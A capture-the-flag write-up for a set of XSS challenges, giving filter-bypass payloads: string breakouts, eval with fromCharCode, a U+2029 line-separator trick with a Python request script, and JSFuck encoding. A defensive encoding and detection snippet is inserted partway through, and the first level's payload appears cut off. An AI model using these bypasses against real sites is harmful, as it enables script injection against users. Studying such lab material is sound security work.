xss_1
The most common tag, script, is filtered, so use img instead.
">
xss_2
Based on the output point, first close the if statement, then close what comes after it :)
Construct the payload:
1");alert(1);("
xss_3
Somewhat like the second one.
'');var a='String.fro'; var b='mCharC'; var c='ode(97, 108, 101, 114, 116, 40, 49, 41)'; var d=a+b+c; eval(eval(d));(''
xss_4
Thanks to fyth.
Someone in the group solved it and then posted the payload:
document.getElementsByName('data')[0].value=String.fromCharCode(0x2029)+"eval('al'+'ert')(1);"+String.fromCharCode(0x2029)
Run this in the console: it writes the 0x2029 line break into data, then submit the form.
Capturing the request during submission shows it more clearly:
data=%E2%80%A9eval%28%27al%27%2B%27ert%27%29%281%29%3B%E2%80%A9
The leading %E2%80%A9 is the line break. Once the submission succeeds, alert(1) fires.
Thoughts:
document.getElementsByName('data')[0].value=String.fromCharCode(0x2029)+"eval('al'+'ert')(1);"+String.fromCharCode(0x2029)
0x1
A line break is written at both the start and the end;
removing the trailing one still gives alert(1).
0x2
A Baidu search shows that 0x2029 represents a carriage return, or paragraph separator,
so 0x2028 represents a new line, or line separator.
Replacing 0x2029 with 0x2028 still works.
0x3
The request captured during submission contains
data=%E2%80%A9
When submitting the packet, intercept it in Burp and edit the POST data's hex to E2 80 A9; this also produces the line break.
0x4
Written in Python:
#!/usr/bin/env python
import requests

# Send the U+2029 paragraph separator followed by the payload as the 'data' field.
# requests encodes the Unicode string as UTF-8, so it appears on the wire as E2 80 A9.
resp = requests.post("http://xss.swpuwllm.com/xss_4/", data={'data': u"\u2029eval('al'+'ert')(1)"})
a = resp.content
print(a)
The returned page can be seen in the output.
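An added example, not from the writeup, showing why the separator in 0x2 behaves like a newline and how a script context should encode untrusted data instead of relying on an ASCII newline filter. The naiveEmbed pattern is an assumption about how the challenge places input in a JavaScript comment, not the challenge's own code.

```javascript
// ECMAScript treats U+2028 (LINE SEPARATOR) and U+2029 (PARAGRAPH SEPARATOR)
// as line terminators, just like \n and \r. A filter that only strips ASCII
// newlines therefore still lets input end a "//" comment or a single line.

// Constructed, assumed embedding pattern: user data is dropped raw into a
// line comment inside a script. Returns the script source as a string.
function naiveEmbed(data) {
  return "var marker = 0; // user note: " + data + "\nreturn marker;";
}

// Execute a script source and return its value (stand-in for the browser).
function runEmbedded(src) {
  return new Function(src)();
}

// Detection: flag any JavaScript line terminator, not just \n and \r.
// Useful for input validation and for logging attempts like the one above.
function hasJsLineTerminator(s) {
  return /[\n\r\u2028\u2029]/.test(s);
}

// Mitigation: serialize the value for a <script> context. JSON.stringify
// escapes quotes and ASCII control characters but leaves U+2028/U+2029 raw
// (a syntax error in pre-ES2019 engines), so escape them explicitly, and
// escape "</" so the data can never close the script element.
function encodeForScript(value) {
  return JSON.stringify(value)
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029")
    .replace(/<\//g, "<\\/");
}

// Safe embedding: the value lands inside a string literal and round-trips
// unchanged, separators included, instead of becoming code.
function safeRoundTrip(value) {
  return runEmbedded("var data = " + encodeForScript(value) + "; return data;");
}
```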
0x5
Fuzzing showed that letters are filtered but {}[]()!+ are not, which immediately suggested jother encoding. That did not work, so I switched to jsfuck, and the jsfuck-encoded alert(1) submitted successfully. What is the difference between jother and jsfuck? alert(1) encoded with jsfuck has fewer characters than with jother. Why?
[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()